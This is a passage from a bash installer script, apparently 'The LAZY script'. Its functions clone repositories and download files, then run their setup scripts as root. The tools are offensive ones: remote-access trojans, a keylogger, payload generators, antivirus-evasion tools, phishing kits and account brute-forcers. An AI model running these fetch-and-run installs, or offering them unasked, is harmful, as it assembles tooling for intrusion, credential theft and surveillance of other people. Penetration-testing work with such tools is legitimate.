9922 gitlink="https://github.com/wi-fi-analyzer/mdk3-master.git"
9923 install_default
9924 cloned=$?
9925 if [[ "$cloned" == 1 ]]
9926 then
9927 make
9928 make install
9929 fi
9930 }
9931 function install_katana
9932 {
9933 foldname="KatanaFramework"
9934 gitlink="https://github.com/PowerScript/KatanaFramework.git"
9935 install_default
9936 cloned=$?
9937 if [[ "$cloned" == 1 ]]
9938 then
9939 sh dependencies
9940 python install
9941 fi
9942 }
9943 function install_airgeddon
9944 {
9945 foldname="airgeddon"
9946 gitlink="https://github.com/v1s1t0r1sh3r3/airgeddon.git"
9947 install_default
9948 cloned=$?
9949 if [[ "$cloned" == 1 ]]
9950 then
9951 chmod +x airgeddon.sh
9952 fi
9953 }
9954 function install_4nonimizer
9955 {
9956 foldname="4nonimizer"
9957 gitlink="https://github.com/Hackplayers/4nonimizer.git"
9958 install_default
9959 cloned=$?
9960 if [[ "$cloned" == 1 ]]
9961 then
9962 chmod +x 4nonimizer
9963 ./4nonimizer install
9964 clear
9965 cd
9966 apt-get install -y python-pip
9967 apt-get install -y php-curl
9968 gem install pcaprub
9969 gem install packetfu
9970 fi
9971 }
9972 function install_beelogger
9973 {
9974 foldname="BeeLogger"
9975 gitlink="https://github.com/4w4k3/BeeLogger.git"
9976 install_default
9977 cloned=$?
9978 if [[ "$cloned" == 1 ]]
9979 then
9980 chmod +x install.sh
9981 ./install.sh
9982 cd
9983 apt-get install -y python-pip
9984 apt-get install -y php-curl
9985 gem install pcaprub
9986 gem install packetfu
9987 fi
9988 }
9989 function install_ezsploit
9990 {
9991 foldname="ezsploit"
9992 gitlink="https://github.com/rand0m1ze/ezsploit.git"
9993 install_default
9994 cloned=$?
9995 if [[ "$cloned" == 1 ]]
9996 then
9997 chmod +x ezsploit.sh
9998 fi
9999 }
10000 function install_pupy
10001 {
10002 foldname="pupy"
10003 gitlink="https://github.com/n1nj4sec/pupy.git"
10004 install_default
10005 cloned=$?
10006 if [[ "$cloned" == 1 ]]
10007 then
10008 git submodule init
10009 git submodule update
10010 cd pupy
10011 pip install -r requirements.txt
10012 fi
10013 }
10014 function install_zirikatu
10015 {
10016 foldname="zirikatu"
10017 gitlink="https://github.com/pasahitz/zirikatu.git"
10018 install_default
10019 cloned=$?
10020 if [[ "$cloned" == 1 ]]
10021 then
10022 chmod +x zirikatu.sh
10023 fi
10024 }
10025 function install_wifiautopwner
10026 {
10027 foldname="WiFi-autopwner"
10028 gitlink="https://github.com/Mi-Al/WiFi-autopwner.git"
10029 install_default
10030 }
10031 function install_bully
10032 {
10033 foldname="bully"
10034 gitlink="https://github.com/aanarchyy/bully.git"
10035 install_default
10036 cloned=$?
10037 if [[ "$cloned" == 1 ]]
10038 then
10039 cd src
10040 make
10041 sudo make install
10042 fi
10043 }
10044 function install_anonsurf
10045 {
10046 foldname="kali-anonsurf"
10047 gitlink="https://github.com/Und3rf10w/kali-anonsurf.git"
10048 install_default
10049 cloned=$?
10050 if [[ "$cloned" == 1 ]]
10051 then
10052 chmod +x installer.sh
10053 ./installer.sh
10054 fi
10055 }
10056 function install_anonym8
10057 {
10058 foldname="anonym8"
10059 gitlink="https://github.com/HiroshiManRise/anonym8.git"
10060 install_default
10061 cloned=$?
10062 if [[ "$cloned" == 1 ]]
10063 then
10064 chmod +x INSTALL.sh
10065 ./INSTALL.sh
10066 fi
10067 }
10068 function install_thefatrat
10069 {
10070 foldname="TheFatRat"
10071 gitlink="https://github.com/Screetsec/TheFatRat.git"
10072 install_default
10073 cloned=$?
10074 if [[ "$cloned" == 1 ]]
10075 then
10076 chmod +x setup.sh && ./setup.sh
10077 fi
10078 }
10079 function install_angryip
10080 {
10081 cd
10082 if [[ -f "/root/ipscan_*" ]]
10083 then
10084 echo -e "Removing old file"
10085 sleep 2
10086 rm -f /root/ipscan_*
10087 fi
10088 echo -e "Downloading angryipscanner"
10089 sleep 2
10090 wget https://github.com/angryip/ipscan/releases/download/3.5.2/ipscan_3.5.2_amd64.deb
10091 echo -e "Installing..."
10092 dpkg -i ipscan_3.5.2*
10093 echo -e "Done"
10094 sleep 1
10095 }
10096 function install_sniper
10097 {
10098 foldname="Sn1per"
10099 gitlink="https://github.com/1N3/Sn1per.git"
10100 install_default
10101 cloned=$?
10102 if [[ "$cloned" == 1 ]]
10103 then
10104 chmod +x install.sh
10105 ./install.sh
10106 fi
10107 }
10108 function install_recondog
10109 {
10110 foldname="ReconDog"
10111 gitlink="https://github.com/UltimateHackers/ReconDog.git"
10112 install_default
10113 }
10114 function install_redhawk
10115 {
10116 foldname="RED_HAWK"
10117 gitlink="https://github.com/Tuhinshubhra/RED_HAWK.git"
10118 install_default
10119 }
10120 function install_winpayloads
10121 {
10122 foldname="Winpayloads"
10123 gitlink="https://github.com/nccgroup/Winpayloads.git"
10124 install_default
10125 cloned=$?
10126 if [[ "$cloned" == 1 ]]
10127 then
10128 chmod +x setup.sh
10129 ./setup.sh
10130 fi
10131 }
10132 function install_chaos
10133 {
10134 apt install golang upx-ucl -y
10135 cd
10136 foldname="CHAOS"
10137 gitlink="https://github.com/tiagorlampert/CHAOS.git"
10138 install_default
10139 }
10140 function install_routersploit
10141 {
10142 foldname="routersploit"
10143 gitlink="https://github.com/reverse-shell/routersploit.git"
10144 install_default
10145 cloned=$?
10146 if [[ "$cloned" == 1 ]]
10147 then
10148 apt-get install python3-pip
10149 python3 -m pip install -r requirements.txt
10150 python setup.py install
10151 fi
10152 }
10153 function install_infoga
10154 {
10155 foldname="Infoga"
10156 gitlink="https://github.com/m4ll0k/Infoga.git"
10157 install_default
10158 cloned=$?
10159 if [[ "$cloned" == 1 ]]
10160 then
10161 pip install -r requirements.txt
10162 fi
10163 }
10164 function install_nwatch
10165 {
10166 foldname="nWatch"
10167 gitlink="https://github.com/suraj-root/nWatch.git"
10168 install_default
10169 cloned=$?
10170 if [[ "$cloned" == 1 ]]
10171 then
10172 pip install scapy
10173 pip install colorama
10174 pip install nmap
10175 pip install ctypes
10176 pip2.7 install scapy
10177 pip2.7 install colorama
10178 pip2.7 install nmap
10179 pip2.7 install ctypes
10180 fi
10181 }
10182 function install_eternalscanner
10183 {
10184 foldname="eternal_scanner"
10185 gitlink="https://github.com/peterpt/eternal_scanner.git"
10186 install_default
10187 cloned=$?
10188 if [[ "$cloned" == 1 ]]
10189 then
10190 apt-get install -y masscan metasploit-framework
10191 fi
10192 }
10193 function install_eaphammer
10194 {
10195 foldname="eaphammer"
10196 gitlink="https://github.com/s0lst1c3/eaphammer.git"
10197 install_default
10198 cloned=$?
10199 if [[ "$cloned" == 1 ]]
10200 then
10201 chmod +x kali-setup
10202 ./kali-setup
10203 apt-get install -y python-tqdm
10204 fi
10205 }
10206 function install_dagon
10207 {
10208 foldname="dagon"
10209 gitlink="https://github.com/ekultek/dagon.git"
10210 install_default
10211 cloned=$?
10212 if [[ "$cloned" == 1 ]]
10213 then
10214 pip install -r requirements.txt
10215 pip2.7 install -r requirements.txt
10216 apt-get install -y bcrypt
10217 fi
10218 }
10219 function install_lalin
10220 {
10221 foldname="LALIN"
10222 gitlink="https://github.com/Screetsec/LALIN.git"
10223 install_default
10224 cloned=$?
10225 if [[ "$cloned" == 1 ]]
10226 then
10227 chmod +x Lalin.sh
10228 fi
10229 }
10230 function install_knockmail
10231 {
10232 foldname="KnockMail"
10233 gitlink="https://github.com/4w4k3/KnockMail.git"
10234 install_default
10235 cloned=$?
10236 if [[ "$cloned" == 1 ]]
10237 then
10238 pip install -r requeriments.txt
10239 fi
10240 }
10241 function install_kwetza
10242 {
10243 foldname="kwetza"
10244 gitlink="https://github.com/sensepost/kwetza.git"
10245 install_default
10246 cloned=$?
10247 if [[ "$cloned" == 1 ]]
10248 then
10249 pip install beautifulsoup4
10250 pip2.7 install beautifulsoup4
10251 fi
10252 }
10253 function install_ngrok
10254 {
10255 if [[ -f /root/ngrok || -f /root/ngrok.zip ]]
10256 then
10257 echo -e "Removing old..."
10258 echo -e "$PAKTC"
10259 $READAK
10260 rm -f /root/ngrok
10261 rm -f /root/ngrok.zip
10262 fi
10263 rm -f /root/ngrok.zip
10264 cd
10265 echo -e "Downloading Ngrok"
10266 wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip --output-document=/root/ngrok.zip
10267 echo -e "Unzipping Ngrok"
10268 unzip /root/ngrok.zip
10269 }
10270 function install_netdiscover
10271 {
10272 apt-get install -y netdiscover
10273 }
10274 function install_websploit
10275 {
10276 apt-get install -y websploit
10277 }
10278 function install_openvas
10279 {
10280 apt-get install -y openvas
10281 openvas-setup
10282 }
10283 function install_shellter
10284 {
10285 apt-get install -y shellter
10286 }
10287 function install_geany
10288 {
10289 apt-get install -y geany
10290 }
10291 function install_bleachbit
10292 {
10293 apt-get install -y bleachbit
10294 }
10295 function install_vmr
10296 {
10297 if [[ -d /root/mdk3-v6 || -d /root/VMR ]]
10298 then
10299 echo -e "Removing old..."
10300 echo -e "$PAKTC"
10301 $READAK
10302 rm -r /root/mdk3-v6
10303 if [[ -f /root/VMR-MDK-K2-2017R-012x2.zip ]]
10304 then
10305 rm /root/VMR-MDK-K2-2017R-012x2.zip
10306 fi
10307 if [[ -d /root/VMR ]]
10308 then
10309 rm -r /root/VMR
10310 fi
10311 fi
10312 cd
10313 wget https://github.com/musket33/VMR-MDK-Kali2-Kali2016/raw/master/VMR-MDK-K2-2017R-012x2.zip
10314 unzip /root/VMR-MDK-K2-2017R-012x2.zip -d /root/VMR
10315 cp -r /root/VMR/mdk3-v6 /root/
10316 cd /root/mdk3-v6
10317 make
10318 make install
10319 chmod 755 /root/mdk3-v6/*
10320 chmod +x /root/VMR/*.sh
10321 cd
10322 }
10323 function install_hashbuster
10324 {
10325 foldname="Hash-Buster"
10326 gitlink="https://github.com/UltimateHackers/Hash-Buster.git"
10327 install_default
10328 }
10329 function install_findsploit
10330 {
10331 foldname="Findsploit"
10332 gitlink="https://github.com/1N3/Findsploit.git"
10333 install_default
10334 cloned=$?
10335 if [[ "$cloned" == 1 ]]
10336 then
10337 chmod +x install.sh
10338 ./install.sh
10339 fi
10340 }
10341 function install_howdoi
10342 {
10343 pip install howdoi
10344 pip2.7 install howdoi
10345 }
10346 function install_operative
10347 {
10348 foldname="operative-framework"
10349 gitlink="https://github.com/graniet/operative-framework.git"
10350 install_default
10351 cloned=$?
10352 if [[ "$cloned" == 1 ]]
10353 then
10354 pip install -r requirements.txt
10355 pip2.7 install -r requirements.txt
10356 fi
10357 }
10358 function install_netattack2
10359 {
10360
10361 foldname="netattack2"
10362 gitlink="https://github.com/chrizator/netattack2.git"
10363 install_default
10364 }
10365 function install_koadic
10366 {
10367 foldname="koadic"
10368 gitlink="https://github.com/zerosum0x0/koadic.git"
10369 install_default
10370 cloned=$?
10371 if [[ "$cloned" == 1 ]]
10372 then
10373 pip install -r requirements.txt
10374 pip2.7 install -r requirements.txt
10375 fi
10376 }
10377 function install_empire
10378 {
10379 foldname="Empire"
10380 gitlink="https://github.com/EmpireProject/Empire.git"
10381 install_default
10382 cloned=$?
10383 if [[ "$cloned" == 1 ]]
10384 then
10385 chmod +x setup/install.sh
10386 cd setup
10387 ./install.sh
10388 ./setup_database.py
10389 fi
10390 }
10391 function install_meterpreter_paranoid_mode
10392 {
10393 foldname="Meterpreter_Paranoid_Mode-SSL"
10394 gitlink="https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL.git"
10395 install_default
10396 }
10397 function install_dropit_frmw
10398 {
10399 foldname="Dr0p1t-Framework"
10400 gitlink="https://github.com/D4Vinci/Dr0p1t-Framework.git"
10401 install_default
10402 cloned=$?
10403 if [[ "$cloned" == 1 ]]
10404 then
10405 cd
10406 git clone $gitlink
10407 chmod 777 -R Dr0p1t-Framework
10408 cd Dr0p1t-Framework
10409 chmod +x install.sh
10410 ./install.sh
10411 fi
10412 }
10413 function install_wifi_pumpkin
10414 {
10415 foldname="WiFi-Pumpkin"
10416 gitlink="https://github.com/P0cL4bs/WiFi-Pumpkin.git"
10417 install_default
10418 cloned=$?
10419 if [[ "$cloned" == 1 ]]
10420 then
10421 ./installer.sh --install
10422 fi
10423 }
10424 function install_veil
10425 {
10426 foldname="Veil"
10427 gitlink="https://github.com/Veil-Framework/Veil.git"
10428 install_default
10429 cloned=$?
10430 if [[ "$cloned" == 1 ]]
10431 then
10432 cd setup
10433 ./setup.sh -c
10434 fi
10435 }
10436 function install_leviathan
10437 {
10438 foldname="leviathan"
10439 gitlink="https://github.com/leviathan-framework/leviathan.git"
10440 install_default
10441 cloned=$?
10442 if [[ "$cloned" == 1 ]]
10443 then
10444 pip install -r requirements
10445 pip2.7 install -r requirements
10446 fi
10447 }
10448 function install_fake_image
10449 {
10450 foldname="FakeImageExploiter"
10451 gitlink="https://github.com/r00t-3xp10it/FakeImageExploiter.git"
10452 install_default
10453 cloned=$?
10454 if [[ "$cloned" == 1 ]]
10455 then
10456 chmod +x *.sh
10457 fi
10458 }
10459 function install_avet
10460 {
10461 foldname="avet"
10462 gitlink="https://github.com/govolution/avet.git"
10463 install_default
10464 }
10465 function install_gloom
10466 {
10467 foldname="Gloom-Framework"
10468 gitlink="https://github.com/StreetSec/Gloom-Framework.git"
10469 install_default
10470 cloned=$?
10471 if [[ "$cloned" == 1 ]]
10472 then
10473 python install.py
10474 fi
10475 }
10476 function install_arcanus
10477 {
10478 foldname="ARCANUS"
10479 gitlink="https://github.com/EgeBalci/ARCANUS.git"
10480 install_default
10481 }
10482 function install_msfpc
10483 {
10484 apt-get install -y msfpc
10485 }
10486 function install_morphhta
10487 {
10488 foldname="morphHTA"
10489 gitlink="https://github.com/vysec/morphHTA.git"
10490 install_default
10491 }
10492 function install_lfi
10493 {
10494 foldname="LFISuite"
10495 gitlink="https://github.com/D35m0nd142/LFISuite.git"
10496 install_default
10497 }
10498 function install_unibyav
10499 {
10500 foldname="UniByAv"
10501 gitlink="https://github.com/Mr-Un1k0d3r/UniByAv.git"
10502 install_default
10503 cloned=$?
10504 if [[ "$cloned" == 1 ]]
10505 then
10506 apt-get install -y mingw-w64
10507 fi
10508 }
10509 function install_demiguise
10510 {
10511 foldname="demiguise"
10512 gitlink="https://github.com/nccgroup/demiguise.git"
10513 install_default
10514 }
10515 function install_dkmc
10516 {
10517 foldname="DKMC"
10518 gitlink="https://github.com/Mr-Un1k0d3r/DKMC.git"
10519 install_default
10520 }
10521 function install_sechub
10522 {
10523 foldname="secHub"
10524 gitlink="https://github.com/cys3c/secHub.git"
10525 install_default
10526 cloned=$?
10527 if [[ "$cloned" == 1 ]]
10528 then
10529 python installer.py
10530 chmod +x /usr/bin/sechub
10531 fi
10532 }
10533 function install_beef
10534 {
10535 apt-get install beef-xss
10536 }
10537 function install_mitmf
10538 {
10539 apt-get -y install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
10540 foldname="MITMf"
10541 gitlink="https://github.com/byt3bl33d3r/MITMf"
10542 install_default
10543 cloned=$?
10544 if [[ "$cloned" == 1 ]]
10545 then
10546 git submodule init
10547 git submodule update --recursive
10548 pip install -r requirements.txt
10549 pip2.7 install -r requirements.txt
10550 fi
10551 }
10552 function install_arp_scan
10553 {
10554 apt-get -y install arp-scan
10555 }
10556 function install_netool
10557 {
10558 foldname="opensource"
10559 gitlink="https://github.com/r00t-3xp10it/netool-toolkit"
10560 install_default
10561 cloned=$?
10562 if [[ "$cloned" == 1 ]]
10563 then
10564 chmod +x INSTALL.sh && ./INSTALL.sh
10565 fi
10566 }
10567 function install_sqlmap
10568 {
10569 apt-get install sqlmap
10570 }
10571 function install_patator
10572 {
10573 foldname="patator"
10574 gitlink="https://github.com/lanjelot/patator.git"
10575 install_default
10576 }
10577 function install_zeus
10578 {
10579 foldname="Zeus-Scanner"
10580 gitlink="https://github.com/Ekultek/Zeus-Scanner.git"
10581 install_default
10582 cloned=$?
10583 if [[ "$cloned" == 1 ]]
10584 then
10585 pip install -r requirements.txt
10586 pip2.7 install -r requirements.txt
10587 fi
10588 }
10589 function install_evil_droid
10590 {
10591 foldname="Evil-Droid"
10592 gitlink="https://github.com/M4sc3r4n0/Evil-Droid.git"
10593 install_default
10594 cloned=$?
10595 if [[ "$cloned" == 1 ]]
10596 then
10597 chmod +x evil-droid
10598 fi
10599 }
10600 function install_nosqlmap
10601 {
10602 foldname="NoSQLMap"
10603 gitlink="https://github.com/codingo/NoSQLMap.git"
10604 install_default
10605 cloned=$?
10606 if [[ "$cloned" == 1 ]]
10607 then
10608 python setup.py install
10609 fi
10610 }
10611 function install_eggshell
10612 {
10613 foldname="EggShell"
10614 gitlink="https://github.com/neoneggplant/EggShell.git"
10615 install_default
10616 cloned=$?
10617 if [[ "$cloned" == 1 ]]
10618 then
10619 easy_install pycrypto
10620 python eggshell.py
10621 fi
10622 }
10623 function install_zerodoor
10624 {
10625 foldname="Zerodoor"
10626 gitlink="https://github.com/Souhardya/Zerodoor.git"
10627 install_default
10628 cloned=$?
10629 }
10630 function install_objection
10631 {
10632 pip3 install objection
10633 foldname="objection"
10634 gitlink="https://github.com/sensepost/objection.git"
10635 install_default
10636 cloned=$?
10637 if [[ "$cloned" == 1 ]]
10638 then
10639 python setup.py
10640 fi
10641 }
10642 function install_cromos
10643 {
10644 foldname="cromos"
10645 gitlink="https://github.com/evilsocketbr/cromos.git"
10646 install_default
10647 cloned=$?
10648 if [[ "$cloned" == 1 ]]
10649 then
10650 python setup.py
10651 fi
10652 }
10653 function install_fsociety
10654 {
10655 foldname="fsociety"
10656 gitlink="https://github.com/Manisso/fsociety.git"
10657 install_default
10658 cloned=$?
10659 if [[ "$cloned" == 1 ]]
10660 then
10661 chmod +x install.sh
10662 ./install.sh
10663 fi
10664 }
10665 function install_yuki-chan
10666 {
10667 foldname="Yuki-Chan-The-Auto-Pentest"
10668 gitlink="https://github.com/Yukinoshita47/Yuki-Chan-The-Auto-Pentest.git"
10669 install_default
10670 cloned=$?
10671 if [[ "$cloned" == 1 ]]
10672 then
10673 chmod 777 wafninja joomscan install-perl-module.sh yuki.sh
10674 chmod 777 Module/WhatWeb/whatweb
10675 pip install -r requirements.txt
10676 chmod +x *.sh
10677 ./install-perl-module.sh
10678 fi
10679 }
10680 function install_socialfish
10681 {
10682 foldname="SocialFish"
10683 gitlink="https://github.com/UndeadSec/SocialFish.git"
10684 install_default
10685 cloned=$?
10686 if [[ "$cloned" == 1 ]]
10687 then
10688 pip install -r requirements.txt
10689 pip2.7 install -r requirements.txt
10690 fi
10691 }
10692 function install_autosploit
10693 {
10694 foldname="AutoSploit"
10695 gitlink="https://github.com/NullArray/AutoSploit.git"
10696 install_default
10697 }
10698 function install_blazy
10699 {
10700 foldname="Blazy"
10701 gitlink="https://github.com/UltimateHackers/Blazy.git"
10702 install_default
10703 cloned=$?
10704 if [[ "$cloned" == 1 ]]
10705 then
10706 pip install -r requirements.txt
10707 fi
10708 }
10709 function install_striker
10710 {
10711 foldname="Striker"
10712 gitlink="https://github.com/UltimateHackers/Striker.git"
10713 install_default
10714 cloned=$?
10715 if [[ "$cloned" == 1 ]]
10716 then
10717 pip install -r requirements.txt
10718 fi
10719 }
10720 function install_hyprpulse
10721 {
10722 foldname="hyprPulse"
10723 gitlink="https://github.com/Ethical-H4CK3R/hyprPulse.git"
10724 install_default
10725 cloned=$?
10726 if [[ "$cloned" == 1 ]]
10727 then
10728 chmod +x install.sh
10729 pip2.7 install -r requirements.txt
10730 ./install.sh
10731
10732 fi
10733 }
10734 function install_instaburst
10735 {
10736 foldname="InstaBurst"
10737 gitlink="https://github.com/Ethical-H4CK3R/InstaBurst.git"
10738 install_default
10739 cloned=$?
10740 if [[ "$cloned" == 1 ]]
10741 then
10742 chmod +x install.sh
10743 pip2.7 install -r requirements.txt
10744 ./install.sh
10745
10746 fi
10747 }
10748 function install_sitebroker
10749 {
10750 foldname="SiteBroker"
10751 gitlink="https://github.com/Anon-Exploiter/SiteBroker"
10752 install_default
10753 cloned=$?
10754 if [[ "$cloned" == 1 ]]
10755 then
10756 pip install -r requirements.txt
10757 pip2.7 install -r requirements.txt
10758 fi
10759 }
10760 function install_enigma
10761 {
10762 foldname="Enigma"
10763 gitlink="https://github.com/UndeadSec/Enigma.git"
10764 install_default
10765 }
10766 function install_datasploit
10767 {
10768 foldname="datasploit"
10769 gitlink="https://github.com/DataSploit/datasploit.git"
10770 install_default
10771 cloned=$?
10772 if [[ "$cloned" == 1 ]]
10773 then
10774 pip install --upgrade --force-reinstall -r requirements.txt
10775 pip2.7 install --upgrade --force-reinstall -r requirements.txt
10776 fi
10777 }
10778 function install_instagram-py
10779 {
10780 if [[ -f /usr/local/bin/instagram-py ]]
10781 then
10782 echo -e ""$YS"Upgrading..."$CE""
10783 pip3 install instagram-py --upgrade
10784 else
10785 echo -e ""$YS"Installing..."$CE""
10786 easy_install3 -U pip
10787 pip3 install requests --upgrade
10788 pip3 install requests[socks]
10789 pip3 install stem
10790 pip3 install instagram-py
10791 instagram-py --create-configuration
10792 fi
10793 }
10794
10795
10796#------------------------------------
10797####################################
10798defaults_l
10799printf '\033]2;The LAZY script\a'
10800if [[ "$ONETIMEPERLAUNCH" != "1" ]]
10801then
10802 one_time_per_launch_ks
10803fi
10804####################################
10805if [[ -f ""$LPATH"/IAGREE.txt" ]]
10806then
10807
10808 if [[ ! -f ""$LPATH"/wlan.txt" ]]
10809 then
10810 set_interface_number
10811 fi
10812 if [[ ! -f ""$LPATH"/wlanmon.txt" ]]
10813 then
10814 set_interface_number
10815 fi
10816 if [[ ! -f ""$LPATH"/eth.txt" ]]
10817 then
10818 set_interface_number
10819 fi
10820 clear
10821 WLANNM=$(cat "$LPATH"/wlanmon.txt)
10822 WLANN=$(cat "$LPATH"/wlan.txt)
10823 ETH=$(cat "$LPATH"/eth.txt)
10824#setting iftop's interface
10825 if [[ -f "$LPATH"/settings/iftopint.txt ]]
10826 then
10827 read iftopint < "$LPATH"/settings/iftopint.txt
10828 else
10829 iftopint="$WLANN"
10830 fi
10831 export iftopint
10832 export WLANNM
10833 export WLANN
10834 export ETH
10835 managed_spaces
10836 monitor_spaces
10837 if [[ ! -f "$LPATH"/latestchangelog.txt ]]
10838 then
10839 echo -e "1" > "$LPATH"/latestchangelog.txt
10840 latest_changelog
10841 fi
10842 banner
10843 main_options
10844 if [[ "$BACKL" = "1" ]]
10845 then
10846 exec bash "$0"
10847
10848 else
10849 echo -e "$PAKTGB"
10850 $READAK
10851 exec bash "$0"
10852 fi
10853else
10854 terms_of_use
10855fi
10856